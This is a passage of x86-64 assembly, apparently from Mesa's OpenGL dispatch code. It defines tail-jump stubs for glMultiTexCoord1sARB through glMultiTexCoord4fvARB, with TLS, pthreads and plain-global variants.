	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3048(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord1ivARB), .-GL_PREFIX(MultiTexCoord1ivARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord1sARB)
	.type GL_PREFIX(MultiTexCoord1sARB), @function
/* glMultiTexCoord1sARB: tail-jump through the dispatch-table slot at
 * byte offset 3056.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord1sARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3056(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3056(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3056(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3056(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord1sARB), .-GL_PREFIX(MultiTexCoord1sARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord1svARB)
	.type GL_PREFIX(MultiTexCoord1svARB), @function
/* glMultiTexCoord1svARB: tail-jump through the dispatch-table slot at
 * byte offset 3064.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord1svARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3064(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3064(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3064(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3064(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord1svARB), .-GL_PREFIX(MultiTexCoord1svARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord2dARB)
	.type GL_PREFIX(MultiTexCoord2dARB), @function
/* glMultiTexCoord2dARB: tail-jump through the dispatch-table slot at
 * byte offset 3072.  %rdi and the FP arguments in %xmm0/%xmm1 are
 * spilled to a 24-byte scratch frame (keeps %rsp 16-byte aligned)
 * around the lookup call. */
GL_PREFIX(MultiTexCoord2dARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3072(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3072(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3072(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	call	_glapi_get_dispatch
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3072(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord2dARB), .-GL_PREFIX(MultiTexCoord2dARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord2dvARB)
	.type GL_PREFIX(MultiTexCoord2dvARB), @function
/* glMultiTexCoord2dvARB: tail-jump through the dispatch-table slot at
 * byte offset 3080.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord2dvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3080(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3080(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3080(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3080(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord2dvARB), .-GL_PREFIX(MultiTexCoord2dvARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord2fARB)
	.type GL_PREFIX(MultiTexCoord2fARB), @function
/* glMultiTexCoord2fARB: tail-jump through the dispatch-table slot at
 * byte offset 3088.  %rdi and the FP arguments in %xmm0/%xmm1 are
 * spilled to a 24-byte scratch frame (keeps %rsp 16-byte aligned)
 * around the lookup call. */
GL_PREFIX(MultiTexCoord2fARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3088(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3088(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3088(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	call	_glapi_get_dispatch
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3088(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord2fARB), .-GL_PREFIX(MultiTexCoord2fARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord2fvARB)
	.type GL_PREFIX(MultiTexCoord2fvARB), @function
/* glMultiTexCoord2fvARB: tail-jump through the dispatch-table slot at
 * byte offset 3096.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord2fvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3096(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3096(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3096(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3096(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord2fvARB), .-GL_PREFIX(MultiTexCoord2fvARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord2iARB)
	.type GL_PREFIX(MultiTexCoord2iARB), @function
/* glMultiTexCoord2iARB: tail-jump through the dispatch-table slot at
 * byte offset 3104.  The three argument registers %rdi/%rsi/%rdx are
 * saved around the lookup call (odd push count keeps %rsp 16-byte
 * aligned). */
GL_PREFIX(MultiTexCoord2iARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3104(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3104(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3104(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3104(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord2iARB), .-GL_PREFIX(MultiTexCoord2iARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord2ivARB)
	.type GL_PREFIX(MultiTexCoord2ivARB), @function
/* glMultiTexCoord2ivARB: tail-jump through the dispatch-table slot at
 * byte offset 3112.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord2ivARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3112(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3112(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3112(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3112(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord2ivARB), .-GL_PREFIX(MultiTexCoord2ivARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord2sARB)
	.type GL_PREFIX(MultiTexCoord2sARB), @function
/* glMultiTexCoord2sARB: tail-jump through the dispatch-table slot at
 * byte offset 3120.  The three argument registers %rdi/%rsi/%rdx are
 * saved around the lookup call (odd push count keeps %rsp 16-byte
 * aligned). */
GL_PREFIX(MultiTexCoord2sARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3120(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3120(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3120(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3120(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord2sARB), .-GL_PREFIX(MultiTexCoord2sARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord2svARB)
	.type GL_PREFIX(MultiTexCoord2svARB), @function
/* glMultiTexCoord2svARB: tail-jump through the dispatch-table slot at
 * byte offset 3128.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord2svARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3128(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3128(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3128(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3128(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord2svARB), .-GL_PREFIX(MultiTexCoord2svARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord3dARB)
	.type GL_PREFIX(MultiTexCoord3dARB), @function
/* glMultiTexCoord3dARB: tail-jump through the dispatch-table slot at
 * byte offset 3136.  %rdi and the FP arguments in %xmm0-%xmm2 are
 * spilled to a 40-byte scratch frame (keeps %rsp 16-byte aligned)
 * around the lookup call. */
GL_PREFIX(MultiTexCoord3dARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3136(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3136(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3136(%rax), %r11
	jmp	*%r11
1:
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	call	_glapi_get_dispatch
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3136(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord3dARB), .-GL_PREFIX(MultiTexCoord3dARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord3dvARB)
	.type GL_PREFIX(MultiTexCoord3dvARB), @function
/* glMultiTexCoord3dvARB: tail-jump through the dispatch-table slot at
 * byte offset 3144.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord3dvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3144(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3144(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3144(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3144(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord3dvARB), .-GL_PREFIX(MultiTexCoord3dvARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord3fARB)
	.type GL_PREFIX(MultiTexCoord3fARB), @function
/* glMultiTexCoord3fARB: tail-jump through the dispatch-table slot at
 * byte offset 3152.  %rdi and the FP arguments in %xmm0-%xmm2 are
 * spilled to a 40-byte scratch frame (keeps %rsp 16-byte aligned)
 * around the lookup call. */
GL_PREFIX(MultiTexCoord3fARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3152(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3152(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3152(%rax), %r11
	jmp	*%r11
1:
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	call	_glapi_get_dispatch
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3152(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord3fARB), .-GL_PREFIX(MultiTexCoord3fARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord3fvARB)
	.type GL_PREFIX(MultiTexCoord3fvARB), @function
/* glMultiTexCoord3fvARB: tail-jump through the dispatch-table slot at
 * byte offset 3160.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord3fvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3160(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3160(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3160(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3160(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord3fvARB), .-GL_PREFIX(MultiTexCoord3fvARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord3iARB)
	.type GL_PREFIX(MultiTexCoord3iARB), @function
/* glMultiTexCoord3iARB: tail-jump through the dispatch-table slot at
 * byte offset 3168.  The four argument registers %rdi-%rcx are saved
 * around the lookup call; %rbp is pushed only to keep %rsp 16-byte
 * aligned. */
GL_PREFIX(MultiTexCoord3iARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3168(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3168(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3168(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3168(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord3iARB), .-GL_PREFIX(MultiTexCoord3iARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord3ivARB)
	.type GL_PREFIX(MultiTexCoord3ivARB), @function
/* glMultiTexCoord3ivARB: tail-jump through the dispatch-table slot at
 * byte offset 3176.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord3ivARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3176(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3176(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3176(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3176(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord3ivARB), .-GL_PREFIX(MultiTexCoord3ivARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord3sARB)
	.type GL_PREFIX(MultiTexCoord3sARB), @function
/* glMultiTexCoord3sARB: tail-jump through the dispatch-table slot at
 * byte offset 3184.  The four argument registers %rdi-%rcx are saved
 * around the lookup call; %rbp is pushed only to keep %rsp 16-byte
 * aligned. */
GL_PREFIX(MultiTexCoord3sARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3184(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3184(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3184(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3184(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord3sARB), .-GL_PREFIX(MultiTexCoord3sARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord3svARB)
	.type GL_PREFIX(MultiTexCoord3svARB), @function
/* glMultiTexCoord3svARB: tail-jump through the dispatch-table slot at
 * byte offset 3192.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord3svARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3192(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3192(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3192(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3192(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord3svARB), .-GL_PREFIX(MultiTexCoord3svARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord4dARB)
	.type GL_PREFIX(MultiTexCoord4dARB), @function
/* glMultiTexCoord4dARB: tail-jump through the dispatch-table slot at
 * byte offset 3200.  %rdi and the FP arguments in %xmm0-%xmm3 are
 * spilled to a 40-byte scratch frame (keeps %rsp 16-byte aligned)
 * around the lookup call. */
GL_PREFIX(MultiTexCoord4dARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3200(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	movq	%xmm3, 32(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	32(%rsp), %xmm3
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3200(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3200(%rax), %r11
	jmp	*%r11
1:
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	movq	%xmm3, 32(%rsp)
	call	_glapi_get_dispatch
	movq	32(%rsp), %xmm3
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3200(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord4dARB), .-GL_PREFIX(MultiTexCoord4dARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord4dvARB)
	.type GL_PREFIX(MultiTexCoord4dvARB), @function
/* glMultiTexCoord4dvARB: tail-jump through the dispatch-table slot at
 * byte offset 3208.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord4dvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3208(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3208(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3208(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3208(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord4dvARB), .-GL_PREFIX(MultiTexCoord4dvARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord4fARB)
	.type GL_PREFIX(MultiTexCoord4fARB), @function
/* glMultiTexCoord4fARB: tail-jump through the dispatch-table slot at
 * byte offset 3216.  %rdi and the FP arguments in %xmm0-%xmm3 are
 * spilled to a 40-byte scratch frame (keeps %rsp 16-byte aligned)
 * around the lookup call. */
GL_PREFIX(MultiTexCoord4fARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3216(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	movq	%xmm3, 32(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	32(%rsp), %xmm3
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3216(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3216(%rax), %r11
	jmp	*%r11
1:
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	movq	%xmm3, 32(%rsp)
	call	_glapi_get_dispatch
	movq	32(%rsp), %xmm3
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3216(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord4fARB), .-GL_PREFIX(MultiTexCoord4fARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord4fvARB)
	.type GL_PREFIX(MultiTexCoord4fvARB), @function
/* glMultiTexCoord4fvARB: tail-jump through the dispatch-table slot at
 * byte offset 3224.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord4fvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3224(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3224(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3224(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3224(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
